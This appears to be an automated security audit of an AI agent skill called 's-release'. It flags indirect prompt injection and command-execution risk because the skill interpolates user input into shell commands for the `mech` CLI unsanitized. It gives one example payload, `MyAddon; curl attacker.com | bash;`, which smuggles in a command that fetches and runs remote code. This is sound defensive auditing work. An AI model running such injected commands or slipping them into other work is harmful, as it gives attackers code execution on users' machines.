s-release
Warn
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: MEDIUM (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [Indirect Prompt Injection] (MEDIUM): The skill instructs the agent to construct and execute shell commands using variables derived from user input without providing sanitization or validation instructions.
  - Ingestion points: User-provided values for 'MyAddon', '1.2.0', and 'Release message' in the `SKILL.md` command examples.
  - Boundary markers: Absent. The skill does not define delimiters or warn the agent to ignore embedded instructions within user-provided strings.
  - Capability inventory: Shell command execution via the `mech` CLI tool, which has the power to modify files (version bumps, changelogs) and interact with git (commits, tags).
  - Sanitization: None observed. The instructions show direct string interpolation which could be exploited if a user provides an input like `MyAddon; curl attacker.com | bash;`.
Audit Metadata